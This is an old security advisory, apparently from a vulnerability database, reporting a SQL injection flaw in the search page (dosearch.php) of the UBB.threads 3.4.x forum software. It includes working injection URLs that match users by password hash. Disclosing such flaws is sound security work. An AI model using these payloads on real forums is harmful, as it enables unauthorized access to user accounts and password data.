SQL Injection in UBB.threads 3.4.x

2004-10-23T00:00:00
ID SECURITYVULNS:DOC:7058
Type securityvulns
Reporter Securityvulns
Modified 2004-10-23T00:00:00

Description

Product:

UBB.threads

Vendor:

UBBCentral (http://www.ubbcentral.com/)

Versions:

I tested it successfull on 3.4.x At Version 3.5 you need to be logged in to perform a search. I didnt tested this version.

Problem:

Sql-Injection in dosearch.php dosearch.php?Name=' OR U_Password='PWINMD5

Impact:

A remote user can inject SQL commands

Example:

db5c82346d770f48bdd8929094c0c695 (ubbpass)

/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695 OR /dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/* -> selects a user who got "ubbpass" as password.

Greets fly out to:

felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32, peti, danjo, milch_trinker, hecky, and all i forgot

Greets Florian Rock aka Remoter